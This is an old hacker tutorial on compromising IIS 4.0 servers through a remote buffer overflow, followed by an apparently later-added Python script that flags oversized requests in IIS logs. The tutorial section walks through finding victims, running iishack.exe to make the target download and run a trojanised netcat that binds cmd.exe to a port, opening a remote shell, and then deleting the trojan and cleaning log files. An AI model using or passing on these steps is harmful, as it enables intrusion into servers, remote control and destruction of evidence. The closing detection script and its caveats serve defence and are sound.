How to Attack IIS – Buffer Overflow

The Internet Information Server Attack – Remote buffer overflow exploit.
By r00tsec from Security Espionage Community.
Revised 03/16/00.


Foreword:
This text goes out to all the NT hackers out there. It is based on the info I have from the eEye Digital Security Team, which found the exploit, and on my own experience.
Note: All the files used in this paper can be found at the main page.

According to eEye Digital Security Team the systems affected include:

Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4

I performed the attack from a Windows NT 4.0 machine with the required programs:

iishack.exe
ncx.exe or ncx99.exe or BertzSvc.exe

Ncx.exe is a hacked-up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its arguments, which means that it binds cmd.exe to port 80. The eEye people have received reports from people not being able to use ncx.exe, so they have made another hacked-up version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason ncx.exe sometimes doesn't work is that inetinfo.exe (which already holds port 80) has to be exited before ncx.exe can bind. Ncx.exe fits the description of a Trojan horse! To kick inetinfo.exe use avoid.exe (which will also soon be available at the web site). BertzSvc.exe binds cmd.exe to port 123 instead.

How to do it:

First of all you'll need a server running IIS4 on NT4 with SP3/4/5 + OP4. To find one, go to www.netcraft.com or your favorite "what's-this-site-running" search engine and find a victim running the affected system. Second, you need to craft a buffer overrun of about 3 K on the target machine!
Then launch iishack.exe from the command prompt in WinNT.

Output:

--------(IIS 4.0 remote buffer overflow exploit)----------
(c) dark spyrit -- barns@eeye.com. http://www.eEye.com

[usage: iishack <host> <port> <url> ]
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!
----------------------------------------------------------

Then issue the command as shown in the example beneath:

C:\>iishack www.victim.com 80 YourOwnIpAddress/ncx.exe

Output (if successful):

Data sent!

Note: Give it (the IIS) enough time to download ncx.exe. Hint: Use Rasmon.exe to monitor your outgoing bytes.

After that type telnet www.victim.com 80 in cmd.exe or in the start/run menu.

Output:

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>

Voila! Access granted!
Do whatever you want to do, but remember to:

    - add a scheduled task to restart inetinfo.exe in X minutes (the AT command will do it).
    - add a scheduled task to delete ncx.exe after X-1 minutes.
    - clean the log files (if there are any).
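From the administrator's side, the one trait of this attack that the text pins down is the size of the request: a buffer overrun of roughly 3 K sent to the web server. The following script is an added example written for this page, not code from eEye or from the original tutorial. It parses IIS W3C extended log lines and flags any request whose URI is far longer than a real page name. The log lines are constructed sample data and the 2048-character threshold is an assumption chosen to sit below the ~3 K overrun described above.

```python
"""Flag oversized requests in IIS W3C extended log lines.

Added example for this page (not eEye's or the tutorial author's code).
The sample log below is constructed; the length threshold is an assumption
chosen to sit below the ~3 K buffer overrun the text describes.
"""

# Assumed threshold: ordinary URIs are far shorter, the overrun described is ~3 K.
MAX_URI_LEN = 2048

# Constructed sample log in W3C extended format; field order comes from the #Fields: line.
# The third data line is a fake request carrying a 3000-byte URI from a constructed address.
SAMPLE_LOG = (
    "#Software: Microsoft Internet Information Server 4.0\n"
    "#Version: 1.0\n"
    "#Date: 2000-03-16 10:00:00\n"
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-bytes\n"
    "2000-03-16 10:00:01 10.0.0.5 GET /default.htm - 200 312\n"
    "2000-03-16 10:00:02 10.0.0.5 GET /images/logo.gif - 200 290\n"
    "2000-03-16 10:00:03 192.0.2.77 GET /" + "A" * 3000 + " - 500 3180\n"
    "2000-03-16 10:00:04 10.0.0.8 GET /about.htm - 200 301\n"
)


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Version, #Date) carry no records
        if fields is None:
            raise ValueError("data line appears before the #Fields: header")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated record; IIS encodes spaces in URIs as '+'
        yield dict(zip(fields, values))


def find_oversized_requests(text, max_len=MAX_URI_LEN):
    """Return records whose stem+query exceeds max_len characters."""
    hits = []
    for rec in parse_w3c(text):
        uri = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "-")
        if query != "-":
            uri = uri + "?" + query
        if len(uri) > max_len:
            hits.append({
                "time": rec["date"] + " " + rec["time"],
                "client": rec["c-ip"],
                "uri_len": len(uri),
                "status": rec["sc-status"],
            })
    return hits


if __name__ == "__main__":
    for hit in find_oversized_requests(SAMPLE_LOG):
        print("%(time)s %(client)s uri_len=%(uri_len)d status=%(status)s" % hit)
```

Two caveats follow directly from the text. The tutorial has inetinfo.exe exited so the bound cmd.exe can take port 80, so a web server that dies mid-request may never flush the offending line to its log; an empty log is not a clean bill of health. And the closing checklist tells the intruder to clean the log files, so this check is only as good as a copy of the logs kept somewhere the web server cannot write to.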